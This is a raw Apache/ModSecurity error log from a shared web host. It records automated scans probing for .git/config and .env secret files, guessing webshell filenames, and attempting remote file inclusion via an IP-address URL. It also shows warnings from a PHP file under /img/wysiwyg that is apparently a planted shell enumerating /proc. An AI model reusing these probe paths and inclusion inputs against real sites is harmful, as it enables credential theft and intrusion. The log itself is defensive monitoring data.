[Tue May 12 01:13:30.545918 2026] [security2:error] [pid 1630927:tid 1630932] [client 172.94.9.253:59624] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/config"] [unique_id "agJimmiGYYhUwDaJINnJawAAAUI"], referer: https://tchatbooster.com/.git/config
[Tue May 12 01:13:30.791244 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/son1.php
[Tue May 12 01:13:30.916880 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/ggb.php
[Tue May 12 01:13:31.060720 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/amxloxxr.php
[Tue May 12 01:13:31.084056 2026] [security2:error] [pid 1630927:tid 1630932] [client 172.94.9.253:59624] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agJimmiGYYhUwDaJINnJawAAAUI"], referer: https://tchatbooster.com/.git/config
[Tue May 12 01:13:31.186092 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/ss.php
[Tue May 12 01:13:31.317576 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/sadcut1.php
[Tue May 12 01:13:31.443087 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/rh.php
[Tue May 12 01:13:31.755533 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/99.php
[Tue May 12 01:13:31.881431 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/layout.php
[Tue May 12 01:13:32.013686 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/12.php
[Tue May 12 01:13:32.160383 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/fs.php
[Tue May 12 01:13:32.416285 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/insta.php
[Tue May 12 01:13:32.541719 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/simple.php
[Tue May 12 01:13:32.672546 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/ws81.php
[Tue May 12 01:13:32.852726 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/av.php
[Tue May 12 01:13:33.032168 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/xfile25.php
[Tue May 12 01:13:33.157655 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/wpxml.php
[Tue May 12 01:13:33.282876 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/xstelth.php
[Tue May 12 01:13:33.441196 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/min.php
[Tue May 12 01:13:33.572100 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/geforce.php
[Tue May 12 01:13:33.711578 2026] [:error] [pid 1691274:tid 1691289] [client 172.212.136.43:35878] File does not exist: /home/nearoofr/public_html/moshou.php
[Tue May 12 01:13:35.603427 2026] [ssl:error] [pid 1630927:tid 1630948] (EAI 2)Name or service not known: [client 74.7.230.52:35724] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 01:13:35.603483 2026] [ssl:error] [pid 1630927:tid 1630948] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174133/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174133/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174133/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174133/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174133/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174133/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174158/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174158/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174158/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174158/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174158/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174158/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174176/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174176/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174176/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174176/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174176/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174176/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2925507/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2925507/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2925507/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2925507/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2925507/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2925507/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704825/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704825/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704825/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704825/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704825/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704825/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:13:46.726293 2026] [security2:error] [pid 1630927:tid 1630950] [client 43.155.140.157:41510] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/hello-world/feed/"] [unique_id "agJiqmiGYYhUwDaJINnJcgAAAVQ"]
PHP Warning:  filesize(): stat failed for /proc/2925499/task/3538188/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/3538188/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/3538188/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/3538188/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/3538188/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/3538188/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925718/task/2925718/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925718/task/2925718/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925718/task/2925718/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925718/task/2925718/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925718/task/2925718/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925718/task/2925718/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174180/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174180/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174180/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174180/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174180/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174180/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174173/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174173/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174173/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174173/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174173/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174173/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2928152/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2928152/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2928152/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2928152/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/2928152/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/2928152/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704908/task/1704908/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704908/task/1704908/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704908/task/1704908/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704908/task/1704908/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704908/task/1704908/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704908/task/1704908/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/3538187/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/3538187/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/3538187/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/3538187/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2925499/task/3538187/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2925499/task/3538187/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:14:45.710406 2026] [security2:error] [pid 1695975:tid 1695989] [client 43.156.47.42:55896] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/wp-content/themes/enfold/framework/js/"] [unique_id "agJi5dVI9ymHBxup749wPAAAAIs"]
[Tue May 12 01:14:51.551652 2026] [authz_core:error] [pid 1691274:tid 1691284] [client 47.128.28.153:33180] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/interactivity-api/error_log
[Tue May 12 01:14:59.666701 2026] [security2:error] [pid 1709071:tid 1709098] [client 85.208.96.202:50272] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://188.166.196.47 found within ARGS:url: http://188.166.196.47/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJi87vMumyrWMfSu7qN1AAAAMs"]
[Tue May 12 01:14:59.667462 2026] [security2:error] [pid 1709071:tid 1709098] [client 85.208.96.202:50272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJi87vMumyrWMfSu7qN1AAAAMs"]
[Tue May 12 01:14:59.667733 2026] [security2:error] [pid 1709071:tid 1709098] [client 85.208.96.202:50272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJi87vMumyrWMfSu7qN1AAAAMs"]
[Tue May 12 01:15:03.858195 2026] [security2:error] [pid 1709071:tid 1709096] [client 43.155.157.239:49426] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/chat-bot/"] [unique_id "agJi97vMumyrWMfSu7qN1wAAAMk"]
[Tue May 12 01:15:17.277487 2026] [security2:error] [pid 1709071:tid 1709102] [client 43.130.71.237:37452] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/camping-port-grimaud/activites/club-enfant/"] [unique_id "agJjBbvMumyrWMfSu7qN3QAAAM8"]
[Tue May 12 01:15:38.532575 2026] [core:error] [pid 1707624:tid 1707697] [client 199.45.155.94:21238] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:15:38.534635 2026] [core:error] [pid 1707624:tid 1707697] [client 199.45.155.94:21238] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/221/task/221/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/221/task/221/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/221/task/221/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/221/task/221/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/221/task/221/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/221/task/221/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:16:12.382001 2026] [:error] [pid 1695975:tid 1695999] [client 77.75.78.166:19723] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 01:16:23.738077 2026] [authz_core:error] [pid 1695975:tid 1696002] [client 47.128.58.227:51848] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/block-patterns/error_log
[Tue May 12 01:16:54.301899 2026] [security2:error] [pid 1630927:tid 1630937] [client 34.107.89.183:54584] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.local"] [unique_id "agJjZmiGYYhUwDaJINnKUAAAAUc"]
[Tue May 12 01:16:54.303270 2026] [security2:error] [pid 1630927:tid 1630937] [client 34.107.89.183:54584] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.local"] [unique_id "agJjZmiGYYhUwDaJINnKUAAAAUc"]
[Tue May 12 01:16:54.304154 2026] [security2:error] [pid 1709071:tid 1709088] [client 34.107.89.183:54606] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/app/.env.local"] [unique_id "agJjZrvMumyrWMfSu7qONwAAAME"]
[Tue May 12 01:16:54.304345 2026] [security2:error] [pid 1630927:tid 1630937] [client 34.107.89.183:54584] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.local"] [unique_id "agJjZmiGYYhUwDaJINnKUAAAAUc"]
[Tue May 12 01:16:54.304206 2026] [security2:error] [pid 1707624:tid 1707685] [client 34.107.89.183:54598] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJjZrOxS7i6i_mT2NKtrAAAAEM"]
[Tue May 12 01:16:54.304534 2026] [security2:error] [pid 1709071:tid 1709088] [client 34.107.89.183:54606] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/app/.env.local"] [unique_id "agJjZrvMumyrWMfSu7qONwAAAME"]
[Tue May 12 01:16:54.304547 2026] [security2:error] [pid 1707624:tid 1707685] [client 34.107.89.183:54598] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJjZrOxS7i6i_mT2NKtrAAAAEM"]
[Tue May 12 01:16:54.305212 2026] [security2:error] [pid 1709071:tid 1709088] [client 34.107.89.183:54606] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/app/.env.local"] [unique_id "agJjZrvMumyrWMfSu7qONwAAAME"]
[Tue May 12 01:16:54.305390 2026] [security2:error] [pid 1707624:tid 1707685] [client 34.107.89.183:54598] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJjZrOxS7i6i_mT2NKtrAAAAEM"]
[Tue May 12 01:16:54.324394 2026] [security2:error] [pid 1695975:tid 1695992] [client 34.107.89.183:54622] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/api/.env"] [unique_id "agJjZtVI9ymHBxup749xIQAAAI4"]
